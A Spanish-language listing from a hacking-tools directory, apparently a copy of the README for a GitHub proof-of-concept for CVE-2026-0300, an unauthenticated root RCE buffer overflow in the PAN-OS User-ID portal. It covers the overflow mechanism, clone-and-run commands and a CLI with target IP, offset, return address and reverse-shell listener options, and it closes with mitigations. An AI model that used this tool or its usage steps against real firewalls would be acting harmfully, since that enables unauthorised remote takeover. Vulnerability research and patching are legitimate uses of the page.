Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-0300-POC — Prueba de concepto para CVE-2026-0300, un desbordamiento de búfer crítico en el Portal User-ID de PAN-OS que permite la ejecución remota de código no autenticada con privilegios de root. | Kitploit
Herramientas/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

Prueba de concepto para CVE-2026-0300, un desbordamiento de búfer crítico en el Portal User-ID de PAN-OS que permite la ejecución remota de código no autenticada con privilegios de root.

Ver Repositorio
21105hace 4 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2026-0300: Análisis de RCE en el Portal User-ID™ de PAN-OS

Prueba de Concepto de Investigación: CWE-787 Escritura Fuera de Límites

Security Python License Dependencies

📌 Resumen

CVE-2026-0300 es una vulnerabilidad de desbordamiento de búfer de alta gravedad identificada en el Portal de Autenticación User-ID™ (Portal Cautivo) de Palo Alto Networks PAN-OS. Este repositorio de investigación demuestra la lógica técnica de la vulnerabilidad, centrándose específicamente en cómo un paquete de red no autenticado puede conducir a la Ejecución Remota de Código (RCE) con privilegios de root.


📊 Desglose de la Vulnerabilidad

CaracterísticaDetalles
ID CVECVE-2026-0300
Puntuación de Gravedad9.3 (Crítico)
Tipo de DebilidadCWE-787: Escritura Fuera de Límites
Vector de AtaqueRed (No autenticado)
Privilegios RequeridosNinguno
Interacción del UsuarioNinguna
Software AfectadoPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 Mecanismo Técnico

La vulnerabilidad ocurre cuando el servicio del Portal de Autenticación User-ID no valida la longitud de los datos entrantes antes de escribirlos en un búfer de memoria.

  1. El Búfer: El servicio asigna un área de memoria de tamaño fijo para procesar las solicitudes del portal.
  2. El Desbordamiento: Una solicitud POST especialmente diseñada envía una carga útil que supera este tamaño.
  3. La Sobrescritura: Los datos excedentes sobrescriben la pila/montón, permitiendo al atacante controlar el Puntero de Instrucción (EIP/RIP) y ejecutar shellcode arbitrario.

🛠️ Instalación y Configuración

1. Requisitos Previos

  • Python 3.9 o superior.
  • No se requieren librerías externas (Utiliza socket, struct y argparse estándar).

2. Clonación de la Herramienta de Investigación

Clonar el repositorio

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

Navegar a la carpeta

root@kitploit:~
cd CVE-2026-0300-POC

Hacer ejecutable el script

root@kitploit:~
chmod +x research_poc.py

🚀 Guía de Uso

Esta herramienta está diseñada con una CLI (Interfaz de Línea de Comandos) profesional.

Comando Básico

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

Parámetros Avanzados

IndicadorNombreDescripciónPredeterminado
-t--target(Requerido) Dirección IP del firewall objetivo.N/D
-p--portEl puerto donde se ejecuta el Portal User-ID.6082
-o--offsetLa longitud en bytes para alcanzar el punto de desbordamiento de memoria.2048
-r--retLa dirección de retorno en hexadecimal.0xdeadbeef
-l--lhostDirección IP de la shell inversaTu IP
-L--lportTu puerto de escucha4444

🛡️ Mitigación y Seguridad

  • Actualizar PAN-OS: Instalar los últimos parches de seguridad (Publicados en mayo de 2026).
  • Restricción de IP: Restringir el acceso al portal a zonas IP internas de confianza.
  • Deshabilitar el Portal: Si la Autenticación User-ID no es necesaria, deshabilitar la función.

⚠️ Aviso Ético y Legal

SOLO PARA INVESTIGACIÓN EDUCATIVA Y AUTORIZADA. Las pruebas no autorizadas contra sistemas que no posees son ilegales. El autor no es responsable del mal uso de este código de investigación. Úsalo de manera responsable para mejorar la seguridad global. Desarrollado por: https://t.me/p3Nt3st3rsTAr Fecha de Descubrimiento de la Vulnerabilidad: 07 de mayo de 2026

Descargar herramienta